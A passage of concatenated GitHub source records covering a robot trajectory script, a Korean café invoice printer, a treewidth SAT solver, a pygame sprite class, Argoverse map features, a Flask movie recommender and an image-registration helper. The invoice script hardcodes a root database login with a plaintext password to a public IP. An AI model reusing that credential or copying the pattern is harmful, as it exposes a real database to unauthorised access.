cost_task.lengthJ)\n for t in range(problem.T):\n ydiff = problem.cost.ydiff[t][cost_task.startJ:cost_task.startJ+cost_task.lengthJ]\n rho = problem.cost.S[t][cost_task.startJ:cost_task.startJ+cost_task.lengthJ,cost_task.startJ:cost_task.startJ+cost_task.lengthJ]\n cost = np.dot(np.dot(ydiff, rho), ydiff)\n costs[task_name][t] = ct * cost\n # '''\n if do_plot:\n costs['Task'] = np.zeros((problem.T,))\n costs['Transition'] = np.zeros((problem.T,))\n for t in range(problem.T):\n costs['Task'][t] = problem.get_scalar_task_cost(t)\n costs['Transition'][t] = problem.get_scalar_transition_cost(t)\n for cost in costs:\n plt.plot(costs[cost], label=cost)\n plt.legend()\n plt.xlim(0,problem.T)\n plt.title('Cost breakdown across trajectory per task')\n plt.show()\n plot(solution, labels=scene.get_controlled_joint_names())\n print(mug_location)\n return solution\n publish_trajectory(solution, problem.T*problem.tau, problem)\n# '''\n#midpoint = int(problem.T / 2)\n# midpoint = int((t_grasp_begin + t_grasp_duration)/problem.tau)\n# Add a custom publish_trajectory to support attaching the Coke can...\ndef publish_trajectory(traj, T, problem, once=False):\n if len(traj) == 0:\n print(\"Trajectory has zero elements\")\n raise\n signal.signal(signal.SIGINT, sig_int_handler)\n print('Playing back trajectory ' + str(T) + 's')\n dt = float(T) / float(len(traj))\n t = 0\n grasp_times = [t_grasp_begin, t_grasp_duration]\n return(solution)\n # print(\"saving trajectory\")\n # np.save('example_trajectory_t'+str(traj_version),solution)\n # hsrb_exotica_python_script.send_trajectory(solution, grasp_times, dt)\n # while True:\n # try:\n # publish_pose(traj[t], problem, float(t) * dt)\n # sleep(dt)\n\n # # Create screenshot if desired\n # if use_screenshot:\n # screenshot('/tmp/hsr_driveby_visualisation_{:03d}.png'.format(t))\n # sleep(0.1)\n # if t == len(traj) - 1:\n # print(\"Screenshots created, exiting.\")\n # break\n\n # if t >= len(traj) - 1 and once:\n # return\n # t = (t + 1) % len(traj)\n # if t == midpoint:\n # scene.attach_object(\"SodaCan\", \"hand_palm_link\")\n # elif t == 0:\n # scene.attach_object_local(\"SodaCan\", \"\", mug_location)\n # except KeyboardInterrupt:\n # return False\n#print(np.r_[mug_location[:3],3,4,5])\n#print(problem)\n#print(type(problem))\n#print(problem.start_state)\n","repo_name":"rshi159/hsr_driveby_full","sub_path":"scripts/rob_stuff/hsr_meeting_table_aico_whole.py","file_name":"hsr_meeting_table_aico_whole.py","file_ext":"py","file_size_in_byte":8435,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"36"} +{"seq_id":"13240955694","text":"# pos project\n# Invoice maker\n\nimport pymysql\nimport time, datetime\n\nconn = pymysql.connect(host='45.119.147.76', user='root', password='201400867', db='hufPOS', charset='utf8')\ncurs = conn.cursor()\n\nclass Payinfo:\n def getdata(self):\n curs.execute(\"\"\"SELECT * FROM t_payinfo \"\"\")\n conn.commit()\n all_table = curs.fetchall()\n return all_table\n\n def search_obj(self, Pnumb):\n try:\n curs.execute(\"\"\"SELECT * FROM t_payinfo WHERE Pnumb = %s\"\"\", Pnumb)\n conn.commit()\n src_result = curs.fetchall()\n print(src_result)\n return src_result\n except :\n print('there is wrong data, try again')\n\n def get_pmenu(self, Pnumb):\n try:\n curs.execute(\"\"\"SELECT Pmenu FROM t_payinfo WHERE Pnumb = %s\"\"\", Pnumb)\n conn.commit()\n src_result = curs.fetchall()\n print(src_result)\n return src_result\n except :\n print('there is wrong data, try again')\n\n def get_mns(self, MNcode):\n try:\n curs.execute(\"\"\"SELECT MNname, MNprice FROM t_product WHERE MNcode = %s\"\"\", MNcode)\n conn.commit()\n src_result = curs.fetchall()\n print(src_result)\n return src_result\n except :\n print('there is wrong data, try again')\n\ninvo_notdone = True\n\nwhile invo_notdone:\n this_member = Payinfo()\n show_table = this_member.getdata()\n print(show_table)\n print('영수증을 검색하시겠습니까? Y or N')\n\n command = input('type user command: ')\n\n if command == 'y' or command == 'Y': # 2) find payinfo\n Pnumb = input('검색하고자 하는 주문번호를 입력하세요:')\n search_result = str(this_member.search_obj(Pnumb))\n search_result = search_result.strip('(,)')\n\n Pnumb = search_result.split(',')[0]\n\n ptime_slice = search_result.split('(')[1]\n ptime_list = ptime_slice.split('),')[0]\n ptime_list = ''.join(ptime_list)\n ptime_list_year = ''.join(ptime_list.split(',')[0])\n ptime_list_mon = ''.join(ptime_list.split(',')[1])\n ptime_list_day = ''.join(ptime_list.split(',')[2])\n ptime_list_hr = ''.join(ptime_list.split(',')[3])\n ptime_list_mn = ''.join(ptime_list.split(',')[4])\n Ptime = ptime_list_year+ ptime_list_mon + ptime_list_day + ptime_list_hr + ptime_list_mn\n\n pclass = ptime_slice.split('),')[1]\n pclass_list = pclass.strip(''' ',',\"' ''')\n if pclass_list.count('카드'):\n Pclass_card = pclass_list.split(',')[0]\n P_card = int(Pclass_card.split(':')[1])\n else:\n P_card = 0\n if pclass_list.count('현금'):\n if P_card != 0:\n Pclass_cash = pclass_list.split(',')[1]\n else:\n Pclass_cash = pclass_list.split(',')[0]\n P_cash = int(Pclass_cash.split(':')[1])\n else:\n P_cash = 0\n pay_total = P_card + P_cash\n tax = int(pay_total*0.1)\n ohne_zoll = pay_total - tax\n\n pmenu_ls = str(this_member.get_pmenu(Pnumb))\n pmenu_ls = pmenu_ls.strip('((\"\",),)')\n print(pmenu_ls)\n '''mns = pmenu_ls.split(',')\n for idx, val in enumerate(mns):\n if idx % 2 == 1:\n qt = []\n qt.append(val)\n else:\n mn = []\n val = val.strip(\"''\")\n mn.append(val)\n print(qt, mn)'''\n\n #get_mns()\n #pmenu_qt = pmenu_mn.split(',')[1]\n #print(pmenu_qt)\n '''상품명과 단가는 t_product에서 가져오고 수량은 payinfo에서 금액은 단가*수량\n 상품명 찾기:\n pmenu 리스트 각 요소의 앞쪽 두글자 앞에 M 을 붙여서 t_product 테이블에 검색 쿼리를 보내고\n 받아온 정보를 이름, 단가로 변수별로 나눠서 저장한다.\n 리스트 각 요소 , 뒤 숫자가 수량으로 저장되면 된다.\n 금액은 단가 * 수량\n 리스트로 만들어서 상품명 단가 수량 금액 \\n \n 문자열로 만들려면 마지막에 ''.join()'''\n\n print(\"\"\"\" \n 영\t \t 수\t\t 증\n \t동네카페 외대 본점\n인터넷:www.dongne-cafe.onilne\n주소: 서울시 동대문구 이문로 107\n사업자: 201-81-20323 대표: dmkim\nTEL: 02-2173-2216\tFAX: 02-2173-0114\n주문시간:\"\"\", Ptime, \"\"\"\n포스No:1\t담당자:카페4조\t 주문번호: \"\"\", Pnumb, \"\"\"\n--------------------------------------------\n상품명\t\t 단가 수량 금액\n--------------------------------------------\n\"\"\", pmenu_ls, \"\"\"\n\n--------------------------------------------\n카드계\t\t\t\t\t\t \"\"\", P_card, \"\"\"\n현금계\t\t\t\t\t \"\"\", P_cash, \"\"\"\n총판매계\t\t\t \"\"\", pay_total, \"\"\" \n--------------------------------------------\n과세상품금액\t\t\t\t \"\"\", ohne_zoll, \"\"\" \n부가가치세\t\t\t\t \"\"\", tax, \"\"\" \n--------------------------------------------\n\tVielen Dank! Wiedersehen!\n\t\n\"\"\")\n\n else:\n print('영수증 검색을 취소했습니다.')\n Invo_notdone = True","repo_name":"Tieo/hufPOS_module","sub_path":"InvoiceMaker.py","file_name":"InvoiceMaker.py","file_ext":"py","file_size_in_byte":5208,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"23897603203","text":"import subprocess\n\nimport ctw.c_lower_bound as clb\nimport ctw.c_upper_bound as cb\nimport tw_utils\nimport sys\nfrom ctw import c_sv as svc\nimport sys\nfrom pysat.solvers import Glucose3\n\n\ndef solve_c(g, c_vertices, tub, c_value):\n c_lb = clb.c_lower_bound(g, c_vertices)\n print(f\"C lower bound {c_lb}\")\n val = c_value - 1\n ordering = None\n\n while c_lb <= val < c_value:\n print(f\"\\nLooking for decomposition of width C: {val}\")\n\n enc = svc.CTwEncoding(c_vertices, val, g)\n enc.encode()\n enc.encode_card(tub)\n\n with Glucose3() as slv:\n slv.append_formula(enc.formula)\n result = slv.solve()\n if result:\n model = {abs(x): x > 0 for x in slv.get_model()}\n ordering = []\n\n for i in range(0, len(g.nodes)):\n pos = 0\n for j in ordering:\n if not model[enc._ord(j, i)]:\n break\n pos += 1\n\n ordering.insert(pos, i)\n\n # Translate encoder indexing\n ordering = [enc.nodes[x] for x in ordering]\n\n b, t, r = tw_utils.ordering_to_decomp(g, ordering)\n # Check actual size of decomposition and proceed accordingly\n tub = max(len(cb) - 1 for cb in b.values())\n knownc = max(len(cb & c_vertices) for cb in b.values())\n val = knownc - 1\n print(f\"Found decomposition of size {tub}, C: {knownc}\")\n sys.stdout.flush()\n else:\n print(\"Failed to find decomposition\")\n sys.stdout.flush()\n val += 1\n\n print(f\"\\nFound tree width {tub}, C: {knownc}\")\n sys.stdout.flush()\n return tub, ordering\n\n return val, tub, ordering\n\n\ndef solve(g, c_vertices, tub=None):\n if len(c_vertices) == 0:\n return -1, None\n print(f\"Graph has {len(g.nodes)} nodes, {len(g.edges)} edges and {len(c_vertices)} c-vertices\")\n\n tub2, c_val, ordering = cb.min_c(g, c_vertices)\n if tub is None or tub2 < tub:\n tub = tub2\n\n tub2, val, ordering2 = solve_c(g, c_vertices, tub, c_val)\n if ordering2 is not None:\n c_val = val\n tub = tub2\n ordering = ordering2\n\n print(f\"Upper bound C: {c_val}, tree width {tub}\")\n sys.stdout.flush()\n\n # For c-treewidth we have to find the optimal c-value\n tlb = 1\n cval = tub-1\n knownc = c_val\n\n while tlb <= cval < tub:\n print(f\"\\nLooking for decomposition of size {cval}, C: {c_val}\")\n enc = svc.CTwEncoding(c_vertices, c_val, g)\n enc.encode()\n enc.encode_card(cval)\n\n with Glucose3() as slv:\n slv.append_formula(enc.formula)\n result = slv.solve()\n if result:\n model = {abs(x): x > 0 for x in slv.get_model()}\n ordering = []\n\n for i in range(0, len(g.nodes)):\n pos = 0\n for j in ordering:\n if not model[enc._ord(j, i)]:\n break\n pos += 1\n\n ordering.insert(pos, i)\n\n # Translate encoder indexing\n ordering = [enc.nodes[x] for x in ordering]\n\n b, t, r = tw_utils.ordering_to_decomp(g, ordering)\n # Check actual size of decomposition and proceed accordingly\n tub = max(len(cb) - 1 for cb in b.values())\n knownc = max(len(cb & c_vertices) for cb in b.values())\n cval = tub - 1\n print(f\"Found decomposition of size {tub}, C: {knownc}\")\n sys.stdout.flush()\n else:\n print(\"Failed to find decomposition\")\n sys.stdout.flush()\n cval += 1\n tlb = cval\n\n print(f\"\\nFound tree width {tub}, C: {knownc}\")\n sys.stdout.flush()\n return tub, ordering\n","repo_name":"ASchidler/tw-sv","sub_path":"ctw/solve_ctw.py","file_name":"solve_ctw.py","file_ext":"py","file_size_in_byte":4002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"33596664415","text":"import pygame\nimport time\npygame.init()\ndisplay_width = 900\ndisplay_height = 600\ngameDisplay = pygame.display.set_mode((display_width, display_height))\n\nclass Player:\n\n\tdef __init__(self, position, imglist, jumpsprite, fallsprite):\n\t\tself.xpos = position[0]\n\t\tself.ypos = position[1]\n\t\tself.imglist = imglist\n\t\tself.jumpsprite = jumpsprite\n\t\tself.fallsprite = fallsprite\n\t\tself.stillsprite = imglist[8]\n\t\tself.imgtrack = 0\n\t\tself.xvel = 0\n\t\tself.yvel = 0\n\t\tself.maxvel = 5\n\t\tself.flip = False\n\t\tself.jumping = False\n\t\tself.falling = False\n\t\tself.still = True\n\n\tdef place(self, posx, posy):\n\t\tif not self.jumping and not self.falling and not self.still:\n\t\t\tif not self.flip:\n\t\t\t\tgameDisplay.blit(self.imglist[self.imgtrack], (posx, posy))\n\t\t\t\tself.imgtrack = (self.imgtrack + 1) % len(self.imglist)\n\t\t\telse:\n\t\t\t\tgameDisplay.blit(pygame.transform.flip(self.imglist[self.imgtrack], True, False), (posx, posy))\n\t\t\t\tself.imgtrack = (self.imgtrack + 1) % len(self.imglist)\n\t\telse:\n\t\t\tif self.still:\n\t\t\t\tif not self.flip:\n\t\t\t\t\tgameDisplay.blit(self.stillsprite, (posx, posy))\n\t\t\t\telse:\n\t\t\t\t\tgameDisplay.blit(pygame.transform.flip(self.stillsprite, True, False), (posx, posy))\n\t\t\telif self.jumping:\n\t\t\t\tif not self.flip:\n\t\t\t\t\tgameDisplay.blit(self.jumpsprite, (posx, posy))\n\t\t\t\telse:\n\t\t\t\t\tgameDisplay.blit(pygame.transform.flip(self.jumpsprite, True, False), (posx, posy))\n\t\t\telif self.falling:\n\t\t\t\tif not self.flip:\n\t\t\t\t\tgameDisplay.blit(self.fallsprite, (posx, posy))\n\t\t\t\telse:\n\t\t\t\t\tgameDisplay.blit(pygame.transform.flip(self.fallsprite, True, False), (posx, posy))","repo_name":"andychau/Shooter","sub_path":"PlayerClass.py","file_name":"PlayerClass.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"25169179486","text":"\"\"\"This module is used for computing map features for motion forecasting baselines.\"\"\"\n\nfrom typing import Any, Dict, List, Tuple\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom shapely.geometry import LineString, Point, Polygon\nfrom shapely.ops import cascaded_union\n\nfrom argoverse.map_representation.map_api import ArgoverseMap\nfrom argoverse.utils.centerline_utils import (\n get_nt_distance,\n remove_overlapping_lane_seq,\n)\nfrom argoverse.utils.mpl_plotting_utils import visualize_centerline\nfrom utils.baseline_config import (\n _MANHATTAN_THRESHOLD,\n _DFS_THRESHOLD_FRONT_SCALE,\n _DFS_THRESHOLD_BACK_SCALE,\n _MAX_SEARCH_RADIUS_CENTERLINES,\n _MAX_CENTERLINE_CANDIDATES_TEST,\n)\n\n\nclass MapFeaturesUtils:\n \"\"\"Utils for computation of map-based features.\"\"\"\n def __init__(self):\n \"\"\"Initialize class.\"\"\"\n self._MANHATTAN_THRESHOLD = _MANHATTAN_THRESHOLD\n self._DFS_THRESHOLD_FRONT_SCALE = _DFS_THRESHOLD_FRONT_SCALE\n self._DFS_THRESHOLD_BACK_SCALE = _DFS_THRESHOLD_BACK_SCALE\n self._MAX_SEARCH_RADIUS_CENTERLINES = _MAX_SEARCH_RADIUS_CENTERLINES\n self._MAX_CENTERLINE_CANDIDATES_TEST = _MAX_CENTERLINE_CANDIDATES_TEST\n\n def get_point_in_polygon_score(self, lane_seq: List[int],\n xy_seq: np.ndarray, city_name: str,\n avm: ArgoverseMap) -> int:\n \"\"\"Get the number of coordinates that lie insde the lane seq polygon.\n\n Args:\n lane_seq: Sequence of lane ids\n xy_seq: Trajectory coordinates\n city_name: City name (PITT/MIA)\n avm: Argoverse map_api instance\n Returns:\n point_in_polygon_score: Number of coordinates in the trajectory that lie within the lane sequence\n\n \"\"\"\n lane_seq_polygon = cascaded_union([\n Polygon(avm.get_lane_segment_polygon(lane, city_name)).buffer(0)\n for lane in lane_seq\n ])\n point_in_polygon_score = 0\n for xy in xy_seq:\n point_in_polygon_score += lane_seq_polygon.contains(Point(xy))\n return point_in_polygon_score\n\n def sort_lanes_based_on_point_in_polygon_score(\n self,\n lane_seqs: List[List[int]],\n xy_seq: np.ndarray,\n city_name: str,\n avm: ArgoverseMap,\n ) -> List[List[int]]:\n \"\"\"Filter lane_seqs based on the number of coordinates inside the bounding polygon of lanes.\n\n Args:\n lane_seqs: Sequence of lane sequences\n xy_seq: Trajectory coordinates\n city_name: City name (PITT/MIA)\n avm: Argoverse map_api instance\n Returns:\n sorted_lane_seqs: Sequences of lane sequences sorted based on the point_in_polygon score\n\n \"\"\"\n point_in_polygon_scores = []\n for lane_seq in lane_seqs:\n point_in_polygon_scores.append(\n self.get_point_in_polygon_score(lane_seq, xy_seq, city_name,\n avm))\n randomized_tiebreaker = np.random.random(len(point_in_polygon_scores))\n sorted_point_in_polygon_scores_idx = np.lexsort(\n (randomized_tiebreaker, np.array(point_in_polygon_scores)))[::-1]\n sorted_lane_seqs = [\n lane_seqs[i] for i in sorted_point_in_polygon_scores_idx\n ]\n sorted_scores = [\n point_in_polygon_scores[i]\n for i in sorted_point_in_polygon_scores_idx\n ]\n return sorted_lane_seqs, sorted_scores\n\n def get_heuristic_centerlines_for_test_set(\n self,\n lane_seqs: List[List[int]],\n xy_seq: np.ndarray,\n city_name: str,\n avm: ArgoverseMap,\n max_candidates: int,\n scores: List[int],\n ) -> List[np.ndarray]:\n \"\"\"Sort based on distance along centerline and return the centerlines.\n \n Args:\n lane_seqs: Sequence of lane sequences\n xy_seq: Trajectory coordinates\n city_name: City name (PITT/MIA)\n avm: Argoverse map_api instance\n max_candidates: Maximum number of centerlines to return\n Return:\n sorted_candidate_centerlines: Centerlines in the order of their score \n\n \"\"\"\n aligned_centerlines = []\n diverse_centerlines = []\n diverse_scores = []\n num_candidates = 0\n\n # Get first half as aligned centerlines\n aligned_cl_count = 0\n for i in range(len(lane_seqs)):\n lane_seq = lane_seqs[i]\n score = scores[i]\n diverse = True\n centerline = avm.get_cl_from_lane_seq([lane_seq], city_name)[0]\n if aligned_cl_count < int(max_candidates / 2):\n start_dist = LineString(centerline).project(Point(xy_seq[0]))\n end_dist = LineString(centerline).project(Point(xy_seq[-1]))\n if end_dist > start_dist:\n aligned_cl_count += 1\n aligned_centerlines.append(centerline)\n diverse = False\n if diverse:\n diverse_centerlines.append(centerline)\n diverse_scores.append(score)\n\n num_diverse_centerlines = min(len(diverse_centerlines),\n max_candidates - aligned_cl_count)\n test_centerlines = aligned_centerlines\n if num_diverse_centerlines > 0:\n probabilities = ([\n float(score + 1) / (sum(diverse_scores) + len(diverse_scores))\n for score in diverse_scores\n ] if sum(diverse_scores) > 0 else [1.0 / len(diverse_scores)] *\n len(diverse_scores))\n diverse_centerlines_idx = np.random.choice(\n range(len(probabilities)),\n num_diverse_centerlines,\n replace=False,\n p=probabilities,\n )\n diverse_centerlines = [\n diverse_centerlines[i] for i in diverse_centerlines_idx\n ]\n test_centerlines += diverse_centerlines\n\n return test_centerlines\n\n def get_candidate_centerlines_for_trajectory(\n self,\n xy: np.ndarray,\n city_name: str,\n avm: ArgoverseMap,\n viz: bool = False,\n max_search_radius: float = 50.0,\n seq_len: int = 50,\n max_candidates: int = 10,\n mode: str = \"test\",\n ) -> List[np.ndarray]:\n \"\"\"Get centerline candidates upto a threshold.\n\n Algorithm:\n 1. Take the lanes in the bubble of last observed coordinate\n 2. Extend before and after considering all possible candidates\n 3. Get centerlines based on point in polygon score.\n\n Args:\n xy: Trajectory coordinates, \n city_name: City name, \n avm: Argoverse map_api instance, \n viz: Visualize candidate centerlines, \n max_search_radius: Max search radius for finding nearby lanes in meters,\n seq_len: Sequence length, \n max_candidates: Maximum number of centerlines to return, \n mode: train/val/test mode\n\n Returns:\n candidate_centerlines: List of candidate centerlines\n\n \"\"\"\n # Get all lane candidates within a bubble\n curr_lane_candidates = avm.get_lane_ids_in_xy_bbox(\n xy[-1, 0], xy[-1, 1], city_name, self._MANHATTAN_THRESHOLD)\n\n # Keep expanding the bubble until at least 1 lane is found\n while (len(curr_lane_candidates) < 1\n and self._MANHATTAN_THRESHOLD < max_search_radius):\n self._MANHATTAN_THRESHOLD *= 2\n curr_lane_candidates = avm.get_lane_ids_in_xy_bbox(\n xy[-1, 0], xy[-1, 1], city_name, self._MANHATTAN_THRESHOLD)\n\n assert len(curr_lane_candidates) > 0, \"No nearby lanes found!!\"\n\n # Set dfs threshold\n traj_len = xy.shape[0]\n\n # Assuming a speed of 50 mps, set threshold for traversing in the front and back\n dfs_threshold_front = (self._DFS_THRESHOLD_FRONT_SCALE *\n (seq_len + 1 - traj_len) / 10)\n dfs_threshold_back = self._DFS_THRESHOLD_BACK_SCALE * (traj_len +\n 1) / 10\n\n # DFS to get all successor and predecessor candidates\n obs_pred_lanes: List[Sequence[int]] = []\n for lane in curr_lane_candidates:\n candidates_future = avm.dfs(lane, city_name, 0,\n dfs_threshold_front)\n candidates_past = avm.dfs(lane, city_name, 0, dfs_threshold_back,\n True)\n\n # Merge past and future\n for past_lane_seq in candidates_past:\n for future_lane_seq in candidates_future:\n assert (\n past_lane_seq[-1] == future_lane_seq[0]\n ), \"Incorrect DFS for candidate lanes past and future\"\n obs_pred_lanes.append(past_lane_seq + future_lane_seq[1:])\n\n # Removing overlapping lanes\n obs_pred_lanes = remove_overlapping_lane_seq(obs_pred_lanes)\n\n # Sort lanes based on point in polygon score\n obs_pred_lanes, scores = self.sort_lanes_based_on_point_in_polygon_score(\n obs_pred_lanes, xy, city_name, avm)\n\n # If the best centerline is not along the direction of travel, re-sort\n if mode == \"test\":\n candidate_centerlines = self.get_heuristic_centerlines_for_test_set(\n obs_pred_lanes, xy, city_name, avm, max_candidates, scores)\n else:\n candidate_centerlines = avm.get_cl_from_lane_seq(\n [obs_pred_lanes[0]], city_name)\n\n if viz:\n plt.figure(0, figsize=(8, 7))\n for centerline_coords in candidate_centerlines:\n visualize_centerline(centerline_coords)\n plt.plot(\n xy[:, 0],\n xy[:, 1],\n \"-\",\n color=\"#d33e4c\",\n alpha=1,\n linewidth=3,\n zorder=15,\n )\n\n final_x = xy[-1, 0]\n final_y = xy[-1, 1]\n\n plt.plot(\n final_x,\n final_y,\n \"o\",\n color=\"#d33e4c\",\n alpha=1,\n markersize=10,\n zorder=15,\n )\n plt.xlabel(\"Map X\")\n plt.ylabel(\"Map Y\")\n plt.axis(\"off\")\n plt.title(f\"Number of candidates = {len(candidate_centerlines)}\")\n plt.show()\n\n return candidate_centerlines\n\n def compute_map_features(\n self,\n agent_track: np.ndarray,\n obs_len: int,\n seq_len: int,\n raw_data_format: Dict[str, int],\n mode: str,\n ) -> Tuple[np.ndarray, Dict[str, Any]]:\n \"\"\"Compute map based features for the given sequence.\n\n If the mode is test, oracle_nt_dist will be empty, candidate_nt_dist will be populated.\n If the mode is train/val, oracle_nt_dist will be populated, candidate_nt_dist will be empty.\n\n Args:\n agent_track : Data for the agent track\n obs_len : Length of observed trajectory\n seq_len : Length of the sequence\n raw_data_format : Format of the sequence\n mode: train/val/test mode\n \n Returns:\n oracle_nt_dist (numpy array): normal and tangential distances for oracle centerline\n map_feature_helpers (dict): Dictionary containing helpers for map features\n\n \"\"\"\n # Get observed 2 secs of the agent\n agent_xy = agent_track[:, [raw_data_format[\"X\"], raw_data_format[\"Y\"]\n ]].astype(\"float\")\n agent_track_obs = agent_track[:obs_len]\n agent_xy_obs = agent_track_obs[:, [\n raw_data_format[\"X\"], raw_data_format[\"Y\"]\n ]].astype(\"float\")\n\n # Get API for Argo Dataset map\n avm = ArgoverseMap()\n\n city_name = agent_track[0, raw_data_format[\"CITY_NAME\"]]\n\n # Get candidate centerlines using observed trajectory\n if mode == \"test\":\n oracle_centerline = np.full((seq_len, 2), None)\n oracle_nt_dist = np.full((seq_len, 2), None)\n candidate_centerlines = self.get_candidate_centerlines_for_trajectory(\n agent_xy_obs,\n city_name,\n avm,\n viz=False,\n max_search_radius=self._MAX_SEARCH_RADIUS_CENTERLINES,\n seq_len=seq_len,\n max_candidates=self._MAX_CENTERLINE_CANDIDATES_TEST,\n )\n\n # Get nt distance for the entire trajectory using candidate centerlines\n candidate_nt_distances = []\n for candidate_centerline in candidate_centerlines:\n candidate_nt_distance = np.full((seq_len, 2), None)\n candidate_nt_distance[:obs_len] = get_nt_distance(\n agent_xy_obs, candidate_centerline)\n candidate_nt_distances.append(candidate_nt_distance)\n\n else:\n oracle_centerline = self.get_candidate_centerlines_for_trajectory(\n agent_xy,\n city_name,\n avm,\n viz=False,\n max_search_radius=self._MAX_SEARCH_RADIUS_CENTERLINES,\n seq_len=seq_len,\n mode=mode,\n )[0]\n candidate_centerlines = [np.full((seq_len, 2), None)]\n candidate_nt_distances = [np.full((seq_len, 2), None)]\n\n # Get NT distance for oracle centerline\n oracle_nt_dist = get_nt_distance(agent_xy,\n oracle_centerline,\n viz=False)\n\n map_feature_helpers = {\n \"ORACLE_CENTERLINE\": oracle_centerline,\n \"CANDIDATE_CENTERLINES\": candidate_centerlines,\n \"CANDIDATE_NT_DISTANCES\": candidate_nt_distances,\n }\n\n return oracle_nt_dist, map_feature_helpers\n","repo_name":"jagjeet-singh/argoverse-forecasting","sub_path":"utils/map_features_utils.py","file_name":"map_features_utils.py","file_ext":"py","file_size_in_byte":14206,"program_lang":"python","lang":"en","doc_type":"code","stars":228,"dataset":"github-code","pt":"36"} +{"seq_id":"6822986820","text":"from flask import Flask, jsonify, request\nimport pandas as pd\nimport numpy as np\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport os\n\nfrom flask_cors import CORS\n\napp = Flask(__name__)\nCORS(app)\n\n\ndf = pd.read_csv(\"all_movies.csv\")\n\nid = []\ntitle = []\ncorpus = []\ndetails_by_id = {}\n\nfor index, row in df.iterrows():\n id.append(str(row['id']))\n title.append(row['title'])\n corpus.append(row['corpus'])\n details_by_id[str(row['id'])] = {\n \"title\": row['title'], \"corpus\": row['corpus'], \"backdrop\": row['backdrop'], \"poster\": row['poster']}\n\nvectorizer = TfidfVectorizer()\ntfidf_matrix = vectorizer.fit_transform(corpus)\n\ngenres = {}\n\nfor root, dirs, files in os.walk(\"./genres\"):\n for file_name in files:\n genre = file_name[:-4]\n file_path = os.path.join(root, file_name)\n df = pd.read_csv(file_path)\n df = df.drop('corpus', axis=1)\n df = df.fillna('')\n data = df.to_dict('records')\n genres[genre] = data\n\n\ndef find_similar_corpus(query, tfidf_matrix):\n query_vector = vectorizer.transform([query])\n similarity_scores = cosine_similarity(query_vector, tfidf_matrix).flatten()\n sorted_indices = np.argsort(similarity_scores)[::-1]\n return sorted_indices, similarity_scores\n\n\ndef find_similar_movies(_ids, k):\n l = 4\n movies = []\n added_movie_ids = set(_ids)\n count = 0\n for _id in _ids:\n if count > 15:\n break\n _corpus = details_by_id[_id][\"corpus\"]\n indices, sim_scores = find_similar_corpus(_corpus, tfidf_matrix)\n for i in range(1, l):\n index = indices[i]\n movie_id = id[index]\n if movie_id and title[index] and movie_id not in added_movie_ids:\n count += 1\n added_movie_ids.add(movie_id)\n poster = details_by_id[movie_id][\"poster\"]\n backdrop = details_by_id[movie_id][\"backdrop\"]\n if not backdrop:\n backdrop = \"\"\n if not poster:\n poster = \"\"\n movies.append({\n \"id\": movie_id,\n \"title\": title[index],\n \"backdrop\": backdrop,\n \"poster\": poster\n })\n else:\n l += 1\n return movies\n\n\nall_movies = []\ndf2 = pd.read_csv(\"all_movies.csv\")\ndf2 = df2.drop('corpus', axis=1)\ndf2 = df2.fillna('')\ndata = df2.to_dict('records')\nall_movies = data\n\n\n@app.route(\"/\")\ndef index():\n return \"Welcome to movie recommender\"\n\n\n@app.route(\"/get_recommendations//\")\ndef similar_movies(ids, k):\n ids = ids.split(\"|\")\n sim_movies = find_similar_movies(ids, k)\n return jsonify(sim_movies)\n\n\n@app.route(\"/get_genre_movies/\")\ndef genre_movies(genre):\n return jsonify(genres[genre])\n\n\n@app.route(\"/get_all_movies\")\ndef get_all_movies():\n return jsonify(all_movies)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n\n# flask --app app.py --debug run\n","repo_name":"walker-617/Recommender-Engine","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"39579146339","text":"file = './2/input.txt'\nwith open(file) as fn:\n raw = fn.read()\n\nt = {\n \"A\": \"r\",\n \"X\": \"r\",\n \"B\": \"p\",\n \"Y\": \"p\",\n \"C\": \"s\",\n \"Z\": \"s\",\n}\n\np = {\n \"r\": 1,\n \"p\": 2,\n \"s\": 3,\n}\n\nw = {\n \"r\": \"p\",\n \"p\": \"s\",\n \"s\": \"r\",\n}\n\nl = {v: k for k, v in w.items()}\n\ndef score(a):\n r = p[a[1]]\n if a[0] == a[1]:\n return r + 3\n if w[a[0]] == a[1]:\n return r + 6\n return r\n\ndef transform(a):\n a[0] = t[a[0]]\n if a[1] == 'Y':\n a[1] = a[0]\n if a[1] == 'Z':\n a[1] = w[a[0]]\n if a[1] == 'X':\n a[1] = l[a[0]]\n return a\n\nparsed = [ score([ t[i] for i in ln.split(\" \") ]) for ln in raw.splitlines() ]\nprint(sum(parsed))\nparsed = [ score(transform(ln.split(\" \"))) for ln in raw.splitlines() ]\nprint(sum(parsed))","repo_name":"PhilippLange/aoc_2022","sub_path":"02/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"29450839101","text":"import cv2\nimport numpy as np\n\n\ndef image_registration(img_1_clr, img_2_clr, n=15000):\n img_1 = cv2.cvtColor(img_1_clr, cv2.COLOR_BGR2GRAY)\n img_2 = cv2.cvtColor(img_2_clr, cv2.COLOR_BGR2GRAY)\n height, width = img_2.shape\n\n # ORB detector\n orb_detector = cv2.ORB_create(n)\n\n kp1, d1 = orb_detector.detectAndCompute(img_1, None)\n kp2, d2 = orb_detector.detectAndCompute(img_2, None)\n\n matcher = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)\n matches = matcher.match(d1, d2)\n matches.sort(key=lambda x: x.distance)\n\n matches = matches[: int(len(matches) * 0.7)]\n no_of_matches = len(matches)\n\n p1 = np.zeros((no_of_matches, 2))\n p2 = np.zeros((no_of_matches, 2))\n\n for i in range(len(matches)):\n p1[i, :] = kp1[matches[i].queryIdx].pt\n p2[i, :] = kp2[matches[i].trainIdx].pt\n\n homography, mask = cv2.findHomography(p1, p2, 